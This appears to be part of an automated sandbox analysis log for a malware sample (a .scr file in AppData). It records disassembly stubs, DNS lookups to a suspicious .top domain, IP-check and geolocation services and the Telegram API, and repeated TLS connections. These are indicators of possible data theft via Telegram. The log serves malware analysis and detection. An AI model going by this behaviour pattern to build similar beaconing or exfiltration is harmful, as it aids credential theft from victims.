                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BCFD1h20_2_021BCD28
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B48D1h20_2_021B4628
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BC2C9h20_2_021BC020
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B3BC9h20_2_021B3920
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B9701h20_2_021B9458
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B89F9h20_2_021B8750
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B7CF1h20_2_021B7A48
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BFA11h20_2_021BF740
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B6FE9h20_2_021B6D40
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B4021h20_2_021B3D78
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BC721h20_2_021BC478
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BEC49h20_2_021BE978
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BBA19h20_2_021BB770
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B3319h20_2_021B3070
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BAD11h20_2_021BAA68
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B7441h20_2_021B7198
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B6739h20_2_021B6490
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B5A31h20_2_021B5788
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BE1C5h20_2_021BDE88
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BD429h20_2_021BD180
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B4D29h20_2_021B4A80
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B9B59h20_2_021B98B0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BF579h20_2_021BF2A8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B8E51h20_2_021B8BA8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B8149h20_2_021B7EA0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B5181h20_2_021B4ED8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BD881h20_2_021BD5D8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BCB7Bh20_2_021BC8D0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B4479h20_2_021B41D0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B3771h20_2_021B34C8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BBE71h20_2_021BBBC8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BB169h20_2_021BAEC0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B85A1h20_2_021B82F8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B7899h20_2_021B75F0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B6B91h20_2_021B68E8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B5E89h20_2_021B5BE0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BE7B1h20_2_021BE4E0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]20_2_022E5F28
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]20_2_022E5F38
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]20_2_022E2B00
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]20_2_022E2E16
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]20_2_022E2A50
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]20_2_022E29CE
                Source: global traffic, DNS query: name: meridianresourcellc.top
                Source: global traffic, DNS query: name: checkip.dyndns.org
                Source: global traffic, DNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: api.telegram.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: api.telegram.org
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.197.72:443
                Source: global trafficTCP traffic: 172.67.197.72:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
